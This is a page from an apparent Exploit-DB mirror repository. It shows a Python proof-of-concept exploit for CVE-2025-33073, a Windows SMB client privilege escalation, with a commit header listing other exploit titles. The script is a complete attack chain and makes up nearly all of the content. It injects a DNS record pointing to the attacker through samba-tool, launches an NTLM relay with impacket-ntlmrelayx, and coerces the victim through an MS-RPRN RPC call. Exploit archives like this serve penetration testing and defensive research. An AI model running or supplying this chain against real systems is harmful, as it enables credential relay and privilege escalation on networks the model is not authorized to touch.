bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/windows/remote/52330.py
Exploit-DB 3cfac1e6a4 DB: 2025-06-16 
15 changes to exploits/shellcodes/ghdb

AirKeyboard iOS App 1.0.5 - Remote Input Injection

Parrot and DJI variants Drone OSes - Kernel Panic Exploit

Skyvern 0.1.85 - Remote Code Execution (RCE) via SSTI

Anchor CMS 0.12.7 - Stored Cross Site Scripting (XSS)

Litespeed Cache WordPress Plugin 6.3.0.1 - Privilege Escalation

PHP CGI Module 8.3.4 - Remote Code Execution (RCE)

Microsoft Excel Use After Free - Local Code Execution

PCMan FTP Server 2.0.7 - Buffer Overflow

PCMan FTP Server 2.0.7 - Remote Buffer Overflow

WebDAV Windows 10 - Remote Code Execution (RCE)

Windows 11 SMB Client - Privilege Escalation & Remote Code Execution (RCE)
2025-06-16 00:18:32 +00:00

121 lines
No EOL
4.9 KiB
Python
Executable file
Raw Permalink Blame History

#!/usr/bin/env python3
# Exploit Title: Windows 11 SMB Client - Privilege Escalation & Remote Code Execution (RCE)
# Author: Mohammed Idrees Banyamer
# Instagram: @banyamer_security
# GitHub: https://github.com/mbanyamer
# Date: 2025-06-13
# Tested on: Windows 11 version 22H2, Windows Server 2022, Kali Linux 2024.2
# CVE: CVE-2025-33073
# Type: Remote
# Platform: Microsoft Windows (including Windows 10, Windows 11, Windows Server 2019/2022/2025)
# Attack Vector: Remote via DNS injection and RPC coercion with NTLM relay
# User Interaction: Required (authenticated domain user)
# Remediation Level: Official Fix Available
#
# Affected Versions:
# - Windows 11 versions 22H2, 22H3, 23H2, 24H2 (10.0.22621.x and 10.0.26100.x)
# - Windows Server 2022 (including 23H2 editions)
# - Windows Server 2019
# - Windows 10 versions from 1507 up to 22H2
# - Windows Server 2016 and 2008 (with appropriate versions)
#
# Description:
# This PoC demonstrates a complex attack chain exploiting improper access control in Windows SMB clients,
# leading to elevation of privilege through DNS record injection, NTLM relay attacks using impacket-ntlmrelayx,
# and coercion of a victim system (including Windows 11) to authenticate to an attacker-controlled server
# via MS-RPRN RPC calls. The exploit affects multiple Windows versions including Windows 11 (10.0.22621.x),
# Windows Server 2022, and earlier versions vulnerable to this method.
#
#
# Note: The exploit requires the victim to be an authenticated domain user and the environment
# must not have mitigations like SMB signing enforced or Extended Protection for Authentication (EPA).
#
# DISCLAIMER: For authorized security testing and educational use only.
import argparse
import subprocess
import socket
import time
import sys
def inject_dns_record(dns_ip, dc_fqdn, record_name, attacker_ip):
print("[*] Injecting DNS record via samba-tool (requires admin privileges)...")
cmd = [
"samba-tool", "dns", "add", dns_ip, dc_fqdn,
record_name, "A", attacker_ip, "--username=Administrator", "--password=YourPassword"
]
try:
subprocess.run(cmd, check=True)
print("[+] DNS record successfully added.")
except subprocess.CalledProcessError:
print("[!] Failed to add DNS record. Check credentials and connectivity.")
sys.exit(1)
def check_record(record_name):
print("[*] Verifying DNS record propagation...")
for i in range(10):
try:
result = socket.gethostbyname_ex(record_name)
if result and result[2]:
print(f"[+] DNS record resolved to: {result[2]}")
return True
except socket.gaierror:
time.sleep(2)
print("[!] DNS record did not propagate or resolve.")
return False
def start_ntlmrelay(target):
print("[*] Starting NTLM relay server (impacket-ntlmrelayx)...")
try:
subprocess.Popen([
"impacket-ntlmrelayx", "-t", target, "--no-smb-server"
])
print("[*] NTLM relay server started.")
except Exception as e:
print(f"[!] Failed to start NTLM relay server: {e}")
sys.exit(1)
def trigger_coercion(victim_ip, fake_host):
print("[*] Triggering victim to authenticate via MS-RPRN RPC coercion...")
cmd = [
"rpcping",
"-t", f"ncacn_np:{victim_ip}[\\pipe\\spoolss]",
"-s", fake_host,
"-e", "1234",
"-a", "n",
"-u", "none",
"-p", "none"
]
try:
subprocess.run(cmd, check=True)
print("[+] Coercion RPC call sent successfully.")
except subprocess.CalledProcessError:
print("[!] RPC coercion failed. Verify victim connectivity and service status.")
sys.exit(1)
def main():
parser = argparse.ArgumentParser(description="Windows 11 SMB Client Elevation of Privilege PoC using DNS Injection + NTLM Relay + RPC Coercion")
parser.add_argument("--attacker-ip", required=True, help="IP address of the attacker-controlled server")
parser.add_argument("--dns-ip", required=True, help="IP address of the DNS server (usually the DC)")
parser.add_argument("--dc-fqdn", required=True, help="Fully qualified domain name of the domain controller")
parser.add_argument("--target", required=True, help="Target system to relay authentication to")
parser.add_argument("--victim-ip", required=True, help="IP address of the victim system to coerce authentication from")
args = parser.parse_args()
record = "relaytrigger"
fqdn = f"{record}.{args.dc_fqdn}"
inject_dns_record(args.dns_ip, args.dc_fqdn, record, args.attacker_ip)
if not check_record(fqdn):
print("[!] DNS verification failed, aborting.")
sys.exit(1)
start_ntlmrelay(args.target)
time.sleep(5) # Wait for relay server to be ready
trigger_coercion(args.victim_ip, fqdn)
print("[*] Exploit chain triggered. Monitor ntlmrelayx output for authentication relays.")
if __name__ == "__main__":
main()
Reference in a new issue View git blame Copy permalink